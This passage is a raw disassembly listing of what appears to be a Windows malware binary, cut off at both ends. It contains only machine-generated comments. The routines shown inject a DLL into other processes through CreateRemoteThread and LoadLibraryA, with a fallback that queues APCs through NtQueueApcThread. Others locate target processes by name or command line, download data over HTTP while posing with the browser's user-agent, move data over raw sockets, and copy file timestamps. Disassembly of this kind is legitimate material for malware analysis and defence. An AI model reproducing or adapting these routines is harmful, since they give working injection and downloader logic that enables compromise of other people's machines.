push esi ; hFile
call SetFileTime
push esi ; hObject
call edi ; CloseHandle
loc_9AC73C: ; CODE XREF: sub_9AC6A4+4C�j
; sub_9AC6A4+80�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AC6A4 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC741(SIZE_T dwBytes)
sub_9AC741 proc near ; CODE XREF: sub_9AA8E9+96�p
dwBytes = dword ptr 4
push [esp+dwBytes] ; dwBytes
push 9 ; dwFlags
call GetProcessHeap
push eax ; hHeap
call HeapAlloc
retn
sub_9AC741 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC755(LPVOID lpMem)
sub_9AC755 proc near ; CODE XREF: sub_9AA8E9+271�p
lpMem = dword ptr 4
push [esp+lpMem] ; lpMem
push 0 ; dwFlags
call GetProcessHeap
push eax ; hHeap
call HeapFree
retn
sub_9AC755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC769(int,LPCSTR lpFileName)
sub_9AC769 proc near ; CODE XREF: sub_9A752A+A4�p
; StartAddress+B4�p ...
var_C = dword ptr -0Ch
hObject = dword ptr -8
NumberOfBytesRead= dword ptr -4
arg_0 = dword ptr 8
lpFileName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_C], esi
call CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz short loc_9AC7EA
push ebx
push edi
push esi ; lpFileSizeHigh
push eax ; hFile
call GetFileSize
mov edi, eax
push edi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
cmp ebx, esi
jz short loc_9AC7DF
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nNumberOfBytesToRead
push ebx ; lpBuffer
push [ebp+hObject] ; hFile
mov [ebp+NumberOfBytesRead], esi
call ReadFile
test eax, eax
jz short loc_9AC7D8
cmp [ebp+NumberOfBytesRead], edi
jnz short loc_9AC7D8
cmp [ebp+NumberOfBytesRead], esi
jz short loc_9AC7D8
mov eax, [ebp+arg_0]
mov [ebp+var_C], ebx
mov [eax], edi
jmp short loc_9AC7DF
; ---------------------------------------------------------------------------
loc_9AC7D8: ; CODE XREF: sub_9AC769+59�j
; sub_9AC769+5E�j ...
push ebx ; hMem
call GlobalFree
loc_9AC7DF: ; CODE XREF: sub_9AC769+42�j
; sub_9AC769+6D�j
push [ebp+hObject] ; hObject
call CloseHandle
pop edi
pop ebx
loc_9AC7EA: ; CODE XREF: sub_9AC769+27�j
mov eax, [ebp+var_C]
pop esi
leave
retn
sub_9AC769 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC7F0(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPCSTR lpFileName)
sub_9AC7F0 proc near ; CODE XREF: sub_9A752A+C6�p
; sub_9ABA9B+B6�p ...
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpFileName = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_4], esi
call CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AC85D
push ebx
mov ebx, [ebp+nNumberOfBytesToWrite]
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push ebx ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
mov [ebp+NumberOfBytesWritten], esi
push edi ; hFile
call WriteFile
test eax, eax
jz short loc_9AC83F
cmp [ebp+NumberOfBytesWritten], ebx
jnz short loc_9AC83F
mov [ebp+var_4], 1
loc_9AC83F: ; CODE XREF: sub_9AC7F0+41�j
; sub_9AC7F0+46�j
push edi ; hObject
call CloseHandle
cmp [ebp+var_4], esi
pop ebx
push [ebp+lpFileName] ; lpFileName
jz short loc_9AC857
call sub_9AC6A4
pop ecx
jmp short loc_9AC85D
; ---------------------------------------------------------------------------
loc_9AC857: ; CODE XREF: sub_9AC7F0+5D�j
call DeleteFileA
loc_9AC85D: ; CODE XREF: sub_9AC7F0+26�j
; sub_9AC7F0+65�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_9AC7F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC864(SOCKET s,u_long len,int)
sub_9AC864 proc near ; CODE XREF: sub_9AF52D+7B�p
; sub_9AF52D+C4�p ...
readfds = fd_set ptr -210h
exceptfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
len = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 210h
mov ecx, [ebp+arg_8]
push ebx
push esi
mov esi, [ebp+len]
push edi
mov edi, [ebp+s]
mov [ebp+timeout.tv_sec], ecx
lea ecx, [ebp+timeout]
push ecx ; timeout
xor eax, eax
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
push eax ; writefds
lea ecx, [ebp+readfds]
xor ebx, ebx
push ecx ; readfds
inc ebx
push eax ; nfds
mov [esi], eax
mov [ebp+readfds.fd_array], edi
mov [ebp+readfds.fd_count], ebx
mov [ebp+exceptfds.fd_array], edi
mov [ebp+exceptfds.fd_count], ebx
mov [ebp+timeout.tv_usec], eax
call select
cmp eax, ebx
mov [ebp+len], eax
jl short loc_9AC91F
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AC91F
lea eax, [ebp+len]
push eax ; argp
push 4004667Fh ; cmd
push edi ; s
call ioctlsocket
cmp eax, 0FFFFFFFFh
jz short loc_9AC92A
push [ebp+len] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9AC91B
push 0 ; flags
push [ebp+len] ; len
push ebx ; buf
push edi ; s
call recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_9AC90D
and dword ptr [esi], 0
loc_9AC90D: ; CODE XREF: sub_9AC864+A4�j
cmp dword ptr [esi], 0
jnz short loc_9AC91B
push ebx ; hMem
call GlobalFree
xor ebx, ebx
loc_9AC91B: ; CODE XREF: sub_9AC864+90�j
; sub_9AC864+AC�j
mov eax, ebx
jmp short loc_9AC92C
; ---------------------------------------------------------------------------
loc_9AC91F: ; CODE XREF: sub_9AC864+59�j
; sub_9AC864+6A�j
push 274Ch ; iError
call WSASetLastError
loc_9AC92A: ; CODE XREF: sub_9AC864+7F�j
xor eax, eax
loc_9AC92C: ; CODE XREF: sub_9AC864+B9�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AC864 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC931(SOCKET s,int,int,int)
sub_9AC931 proc near ; CODE XREF: sub_9AF52D+63�p
; sub_9AF52D+AD�p ...
writefds = fd_set ptr -210h
exceptfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9AC9BC
mov esi, [ebp+s]
xor ebx, ebx
inc ebx
loc_9AC94A: ; CODE XREF: sub_9AC931+89�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+timeout]
push ecx ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
lea ecx, [ebp+writefds]
mov [ebp+timeout.tv_sec], eax
xor eax, eax
push ecx ; writefds
push eax ; readfds
push eax ; nfds
mov [ebp+writefds.fd_array], esi
mov [ebp+writefds.fd_count], ebx
mov [ebp+exceptfds.fd_array], esi
mov [ebp+exceptfds.fd_count], ebx
mov [ebp+timeout.tv_usec], eax
call select
cmp eax, ebx
jl short loc_9AC9C8
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push esi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AC9C8
push eax ; flags
mov eax, [ebp+arg_8]
sub eax, edi
push eax ; len
mov eax, [ebp+arg_4]
add eax, edi
push eax ; buf
push esi ; s
call send
cmp eax, 0FFFFFFFFh
jz short loc_9AC9C3
add edi, eax
cmp edi, [ebp+arg_8]
jl short loc_9AC94A
loc_9AC9BC: ; CODE XREF: sub_9AC931+11�j
mov eax, edi
loc_9AC9BE: ; CODE XREF: sub_9AC931+95�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9AC9C3: ; CODE XREF: sub_9AC931+82�j
; sub_9AC931+A2�j
or eax, 0FFFFFFFFh
jmp short loc_9AC9BE
; ---------------------------------------------------------------------------
loc_9AC9C8: ; CODE XREF: sub_9AC931+58�j
; sub_9AC931+69�j
push 274Ch ; iError
call WSASetLastError
jmp short loc_9AC9C3
sub_9AC931 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC9D5(SOCKET fd,int,u_short netshort,int)
sub_9AC9D5 proc near ; CODE XREF: sub_9AF52D+40�p
exceptfds = fd_set ptr -228h
writefds = fd_set ptr -124h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
timeout = timeval ptr -10h
var_8 = dword ptr -8
argp = dword ptr -4
fd = dword ptr 8
arg_4 = dword ptr 0Ch
netshort = word ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_8], 0
push ebx
push esi
push edi
push 10h ; Size
xor esi, esi
lea eax, [ebp+Dst]
push 0 ; Val
inc esi
push eax ; Dst
mov [ebp+argp], esi
call memset
mov eax, [ebp+arg_4]
add esp, 0Ch
push dword ptr [ebp+netshort] ; netshort
mov [ebp+Dst], 2
mov [ebp+var_1C], eax
call ntohs
mov edi, [ebp+fd]
mov ebx, ioctlsocket
mov [ebp+var_1E], ax
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
push edi ; s
call ebx ; ioctlsocket
push 10h ; namelen
lea eax, [ebp+Dst]
push eax ; name
push edi ; s
call connect
cmp eax, 0FFFFFFFFh
jnz short loc_9ACA48
call WSAGetLastError
cmp eax, 2733h
jnz short loc_9ACAB9
loc_9ACA48: ; CODE XREF: sub_9AC9D5+64�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+timeout]
push ecx ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
lea ecx, [ebp+writefds]
mov [ebp+timeout.tv_sec], eax
xor eax, eax
push ecx ; writefds
push eax ; readfds
push eax ; nfds
mov [ebp+writefds.fd_array], edi
mov [ebp+writefds.fd_count], esi
mov [ebp+exceptfds.fd_array], edi
mov [ebp+exceptfds.fd_count], esi
mov [ebp+timeout.tv_usec], eax
call select
mov [ebp+arg_4], eax
lea eax, [ebp+var_8]
push eax ; argp
push 8004667Eh ; cmd
push edi ; s
call ebx ; ioctlsocket
cmp [ebp+arg_4], esi
jl short loc_9ACAAE
lea eax, [ebp+writefds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jz short loc_9ACAAE
xor eax, eax
jmp short loc_9ACABC
; ---------------------------------------------------------------------------
loc_9ACAAE: ; CODE XREF: sub_9AC9D5+C2�j
; sub_9AC9D5+D3�j
push 274Ch ; iError
call WSASetLastError
loc_9ACAB9: ; CODE XREF: sub_9AC9D5+71�j
or eax, 0FFFFFFFFh
loc_9ACABC: ; CODE XREF: sub_9AC9D5+D7�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AC9D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ACAC1(LPCSTR lpszUrl,int,int)
sub_9ACAC1 proc near ; CODE XREF: sub_9A8FC6+F�p
; sub_9AA572+5E�p ...
szAgent = byte ptr -420h
var_20 = dword ptr -20h
dwIndex = dword ptr -1Ch
hInternet = dword ptr -18h
Buffer = dword ptr -14h
hFile = dword ptr -10h
dwNumberOfBytesRead= dword ptr -0Ch
dwBufferLength = dword ptr -8
var_4 = dword ptr -4
lpszUrl = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+dwBufferLength]
push eax ; cbSize
lea eax, [ebp+szAgent]
push eax ; pszUAOut
push 0 ; dwOption
mov [ebp+dwBufferLength], 400h
call ObtainUserAgentString
mov esi, 10000h
push esi ; dwBytes
push 40h ; uFlags
mov ebx, esi
call GlobalAlloc
mov edi, eax
xor eax, eax
cmp edi, eax
jz loc_9ACC03
xor ecx, ecx
cmp [ebp+arg_8], eax
push eax ; dwFlags
setnz cl
push eax ; lpszProxyBypass
push eax ; lpszProxy
lea eax, [ebp+szAgent]
push ecx ; dwAccessType
push eax ; lpszAgent
call InternetOpenA
test eax, eax
mov [ebp+hInternet], eax
jz loc_9ACC03
xor eax, eax
push eax ; dwContext
push 84080300h ; dwFlags
push eax ; dwHeadersLength
push eax ; lpszHeaders
push [ebp+lpszUrl] ; lpszUrl
push [ebp+hInternet] ; hInternet
call InternetOpenUrlA
test eax, eax
mov [ebp+hFile], eax
jz loc_9ACBFA
and [ebp+dwIndex], 0
lea ecx, [ebp+dwIndex]
push ecx ; lpdwIndex
lea ecx, [ebp+dwBufferLength]
push ecx ; lpdwBufferLength
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
push 20000013h ; dwInfoLevel
push eax ; hRequest
mov [ebp+Buffer], 1F4h
mov [ebp+dwBufferLength], 4
call HttpQueryInfoA
test eax, eax
jz short loc_9ACBF1
cmp [ebp+Buffer], 0C8h
jnz short loc_9ACBF1
and [ebp+dwNumberOfBytesRead], 0
and [ebp+var_4], 0
lea eax, [ebp+dwNumberOfBytesRead]
push eax
push esi
push edi
jmp short loc_9ACBDC
; ---------------------------------------------------------------------------
loc_9ACB94: ; CODE XREF: sub_9ACAC1+126�j
mov eax, [ebp+dwNumberOfBytesRead]
test eax, eax
jz short loc_9ACBE9
add [ebp+var_4], eax
cmp [ebp+var_4], ebx
jnz short loc_9ACBCD
lea esi, [ebx+ebx]
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
mov [ebp+var_20], eax
jz short loc_9ACBE9
push ebx ; Size
push edi ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
push edi ; hMem
call GlobalFree
mov edi, [ebp+var_20]
mov ebx, esi
loc_9ACBCD: ; CODE XREF: sub_9ACAC1+E0�j
lea eax, [ebp+dwNumberOfBytesRead]
push eax ; lpdwNumberOfBytesRead
mov eax, [ebp+var_4]
mov ecx, ebx
sub ecx, eax
push ecx ; dwNumberOfBytesToRead
add eax, edi
push eax ; lpBuffer
loc_9ACBDC: ; CODE XREF: sub_9ACAC1+D1�j
push [ebp+hFile] ; hFile
call InternetReadFile
test eax, eax
jnz short loc_9ACB94
loc_9ACBE9: ; CODE XREF: sub_9ACAC1+D8�j
; sub_9ACAC1+F3�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_9ACBF1: ; CODE XREF: sub_9ACAC1+B8�j
; sub_9ACAC1+C1�j
push [ebp+hFile] ; hInternet
call InternetCloseHandle
loc_9ACBFA: ; CODE XREF: sub_9ACAC1+86�j
push [ebp+hInternet] ; hInternet
call InternetCloseHandle
loc_9ACC03: ; CODE XREF: sub_9ACAC1+41�j
; sub_9ACAC1+65�j
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_9ACC18
test edi, edi
jz short loc_9ACC18
push edi ; hMem
call GlobalFree
xor edi, edi
loc_9ACC18: ; CODE XREF: sub_9ACAC1+148�j
; sub_9ACAC1+14C�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_9ACAC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ACC1F(char *Str2)
sub_9ACC1F proc near ; CODE XREF: sub_9A74E1+2A�p
; sub_9AB59B+8�p ...
Str1 = PROCESSENTRY32 ptr -128h
Str2 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
push esi
xor ebx, ebx
push ebx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9ACC99
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+Str1.dwSize], 128h
lea edi, [ebp+Str1.cntUsage]
rep stosd
lea eax, [ebp+Str1]
push eax ; lppe
push esi ; hSnapshot
call Process32First
pop edi
jmp short loc_9ACC86
; ---------------------------------------------------------------------------
loc_9ACC63: ; CODE XREF: sub_9ACC1F+69�j
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1.szExeFile]
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9ACC8C
lea eax, [ebp+Str1]
push eax ; lppe
push esi ; hSnapshot
call Process32Next
loc_9ACC86: ; CODE XREF: sub_9ACC1F+42�j
test eax, eax
jnz short loc_9ACC63
jmp short loc_9ACC92
; ---------------------------------------------------------------------------
loc_9ACC8C: ; CODE XREF: sub_9ACC1F+58�j
mov ebx, [ebp+Str1.th32ProcessID]
loc_9ACC92: ; CODE XREF: sub_9ACC1F+6B�j
push esi ; hObject
call CloseHandle
loc_9ACC99: ; CODE XREF: sub_9ACC1F+1A�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9ACC1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ACC9F(DWORD dwProcessId,char *lpBuffer)
sub_9ACC9F proc near ; CODE XREF: sub_9A74E1+1A�p
; sub_9A74E1+36�p ...
te = THREADENTRY32 ptr -3Ch
ThreadId = dword ptr -20h
NumberOfBytesWritten= dword ptr -1Ch
var_18 = dword ptr -18h
hProcess = dword ptr -14h
hObject = dword ptr -10h
lpStartAddress = dword ptr -0Ch
lpParameter = dword ptr -8
var_4 = dword ptr -4
dwProcessId = dword ptr 8
lpBuffer = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
push esi
push edi
push [ebp+lpBuffer] ; Str
xor edi, edi
mov [ebp+var_4], edi
call strlen
pop ecx
push [ebp+dwProcessId] ; dwProcessId
mov esi, eax
push edi ; bInheritHandle
push 2Ah ; dwDesiredAccess
inc esi
call OpenProcess
cmp eax, edi
mov [ebp+hProcess], eax
jz loc_9ACE34
push 40h ; flProtect
push 3000h ; flAllocationType
lea ecx, [esi+20h]
push ecx ; dwSize
push edi ; lpAddress
push eax ; hProcess
call VirtualAllocEx
cmp eax, edi
mov [ebp+lpParameter], eax
jz loc_9ACE1A
mov edi, GetModuleHandleA
push ebx
push offset ProcName ; "LoadLibraryA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
mov ebx, GetProcAddress
push eax ; hModule
call ebx ; GetProcAddress
mov [ebp+lpStartAddress], eax
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
inc esi
push esi ; nSize
push [ebp+lpBuffer] ; lpBuffer
push [ebp+lpParameter] ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call WriteProcessMemory
test eax, eax
jz loc_9ACE19
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor esi, esi
push esi ; dwCreationFlags
push [ebp+lpParameter] ; lpParameter
push [ebp+lpStartAddress] ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
push [ebp+hProcess] ; hProcess
call CreateRemoteThread
cmp eax, esi
jz short loc_9ACD52
mov [ebp+var_4], 1
push eax
jmp loc_9ACE13
; ---------------------------------------------------------------------------
loc_9ACD52: ; CODE XREF: sub_9ACC9F+A4�j
push offset aNtqueueapcthre ; "NtQueueApcThread"
push offset aNtdll_dll ; "ntdll.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
cmp eax, esi
mov [ebp+var_18], eax
jz loc_9ACE19
push offset aLoadlibraryexa ; "LoadLibraryExA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
push 0 ; th32ProcessID
push 4 ; dwFlags
mov [ebp+lpStartAddress], eax
call CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz loc_9ACE19
push 6
pop ecx
xor eax, eax
lea edi, [ebp+te.cntUsage]
rep stosd
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
mov [ebp+te.dwSize], 1Ch
call Thread32First
jmp short loc_9ACE0C
; ---------------------------------------------------------------------------
loc_9ACDB2: ; CODE XREF: sub_9ACC9F+16F�j
mov eax, [ebp+dwProcessId]
cmp eax, [ebp+te.th32OwnerProcessID]
jnz short loc_9ACE00
push [ebp+te.th32ThreadID] ; dwThreadId
xor esi, esi
push esi ; bInheritHandle
push 10h ; dwDesiredAccess
call OpenThread
mov ebx, eax
cmp ebx, esi
jz short loc_9ACE00
push esi
push esi
push [ebp+lpParameter]
push [ebp+lpStartAddress]
push ebx
call [ebp+var_18]
push ebx ; hObject
mov edi, eax
call CloseHandle
push edi
push [ebp+te.th32ThreadID]
push offset aThread08xStatu ; "thread: %08x, status: %08x\n"
call printf
add esp, 0Ch
cmp edi, esi
jl short loc_9ACE00
mov [ebp+var_4], 1
loc_9ACE00: ; CODE XREF: sub_9ACC9F+119�j
; sub_9ACC9F+12D�j ...
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
call Thread32Next
loc_9ACE0C: ; CODE XREF: sub_9ACC9F+111�j
test eax, eax
jnz short loc_9ACDB2
push [ebp+hObject] ; hObject
loc_9ACE13: ; CODE XREF: sub_9ACC9F+AE�j
call CloseHandle
loc_9ACE19: ; CODE XREF: sub_9ACC9F+84�j
; sub_9ACC9F+C7�j ...
pop ebx
loc_9ACE1A: ; CODE XREF: sub_9ACC9F+48�j
push [ebp+hProcess] ; hObject
call CloseHandle
cmp [ebp+var_4], 0
jz short loc_9ACE34
push 5DCh ; dwMilliseconds
call Sleep
loc_9ACE34: ; CODE XREF: sub_9ACC9F+2A�j
; sub_9ACC9F+188�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_9ACC9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_9ACE3B proc near ; CODE XREF: sub_9ACEC5+61�p
Buffer = byte ptr -8Ch
var_7C = dword ptr -7Ch
Src = byte ptr -4Ch
Dst = word ptr -0Ch
var_8 = dword ptr -8
NumberOfBytesRead= dword ptr -4
hProcess = dword ptr 8
lpBaseAddress = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push esi
mov esi, ReadProcessMemory
push edi
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov edi, 80h
push edi ; nSize
lea eax, [ebp+6Ch+Buffer]
push eax ; lpBuffer
push [ebp+6Ch+lpBaseAddress] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jnz short loc_9ACE6C
loc_9ACE68: ; CODE XREF: sub_9ACE3B+44�j
; sub_9ACE3B+64�j
xor eax, eax
jmp short loc_9ACEBE
; ---------------------------------------------------------------------------
loc_9ACE6C: ; CODE XREF: sub_9ACE3B+2B�j
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nSize
lea eax, [ebp+6Ch+Buffer]
push eax ; lpBuffer
push [ebp+6Ch+var_7C] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jz short loc_9ACE68
push 8 ; Size
lea eax, [ebp+6Ch+Src]
push eax ; Src
lea eax, [ebp+6Ch+Dst]
push eax ; Dst
call memcpy
movzx eax, [ebp+6Ch+Dst]
mov ecx, [ebp+6Ch+arg_8]
add esp, 0Ch
shr eax, 1
dec ecx
cmp ecx, eax
jb short loc_9ACE68
and word ptr [ebx+eax*2], 0
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
movzx eax, [ebp+6Ch+Dst]
push eax ; nSize
push ebx ; lpBuffer
push [ebp+6Ch+var_8] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
neg eax
sbb eax, eax
neg eax
loc_9ACEBE: ; CODE XREF: sub_9ACE3B+2F�j
pop edi
pop esi
add ebp, 6Ch
leave
retn
sub_9ACE3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ACEC5(DWORD dwProcessId,int,int)
sub_9ACEC5 proc near ; CODE XREF: sub_9ACF3E+71�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_4 = byte ptr -4
dwProcessId = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
call GetModuleHandleA
push eax ; hModule
call GetProcAddress
mov ebx, eax
xor edi, edi
cmp ebx, edi
jnz short loc_9ACEF0
xor eax, eax
jmp short loc_9ACF3A
; ---------------------------------------------------------------------------
loc_9ACEF0: ; CODE XREF: sub_9ACEC5+25�j
push esi
push [ebp+dwProcessId] ; dwProcessId
push edi ; bInheritHandle
push 410h ; dwDesiredAccess
call OpenProcess
mov esi, eax
cmp esi, edi
jnz short loc_9ACF0A
xor eax, eax
jmp short loc_9ACF39
; ---------------------------------------------------------------------------
loc_9ACF0A: ; CODE XREF: sub_9ACEC5+3F�j
lea eax, [ebp+var_4]
push eax
push 18h
lea eax, [ebp+var_1C]
push eax
push edi
push esi
call ebx
test eax, eax
jl short loc_9ACF30
push [ebp+arg_8]
mov ebx, [ebp+arg_4]
push [ebp+var_18]
push esi
call sub_9ACE3B
add esp, 0Ch
mov edi, eax
loc_9ACF30: ; CODE XREF: sub_9ACEC5+55�j
push esi ; hObject
call CloseHandle
mov eax, edi
loc_9ACF39: ; CODE XREF: sub_9ACEC5+43�j
pop esi
loc_9ACF3A: ; CODE XREF: sub_9ACEC5+29�j
pop edi
pop ebx
leave
retn
sub_9ACEC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ACF3E(LPCWSTR lpSrch)
sub_9ACF3E proc near ; CODE XREF: sub_9A74E1+9�p
; sub_9AB567+8�p
First = word ptr -330h
var_32E = byte ptr -32Eh
dwProcessId = PROCESSENTRY32 ptr -128h
lpSrch = dword ptr 8
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
xor ebx, ebx
push ebx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_9ACFF0
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+dwProcessId.dwSize], 128h
lea edi, [ebp+dwProcessId.cntUsage]
rep stosd
lea eax, [ebp+dwProcessId]
push eax ; lppe
push esi ; hSnapshot
call Process32First
jmp short loc_9ACFDC
; ---------------------------------------------------------------------------
loc_9ACF85: ; CODE XREF: sub_9ACF3E+A0�j
xor eax, eax
mov [ebp+First], bx
mov ecx, 81h
lea edi, [ebp+var_32E]
rep stosd
stosw
push 104h ; int
lea eax, [ebp+First]
push eax ; int
push [ebp+dwProcessId.th32ProcessID] ; dwProcessId
call sub_9ACEC5
add esp, 0Ch
test eax, eax
jz short loc_9ACFCF
push [ebp+lpSrch] ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call StrStrIW
test eax, eax
jnz short loc_9ACFE2
loc_9ACFCF: ; CODE XREF: sub_9ACF3E+7B�j
lea eax, [ebp+dwProcessId]
push eax ; lppe
push esi ; hSnapshot
call Process32Next
loc_9ACFDC: ; CODE XREF: sub_9ACF3E+45�j
test eax, eax
jnz short loc_9ACF85
jmp short loc_9ACFE8
; ---------------------------------------------------------------------------
loc_9ACFE2: ; CODE XREF: sub_9ACF3E+8F�j
mov ebx, [ebp+dwProcessId.th32ProcessID]
loc_9ACFE8: ; CODE XREF: sub_9ACF3E+A2�j
push esi ; hObject
call CloseHandle
pop edi
loc_9ACFF0: ; CODE XREF: sub_9ACF3E+1A�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9ACF3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ACFF6 proc near ; CODE XREF: sub_9A798D+24�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, GetModuleHandleA
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
mov ebx, offset aNtdll_dll ; "ntdll.dll"
push ebx ; lpModuleName
call esi ; GetModuleHandleA
mov edi, GetProcAddress
push eax ; hModule
call edi ; GetProcAddress
push offset aNtsetinformati ; "NtSetInformationProcess"
push ebx ; lpModuleName
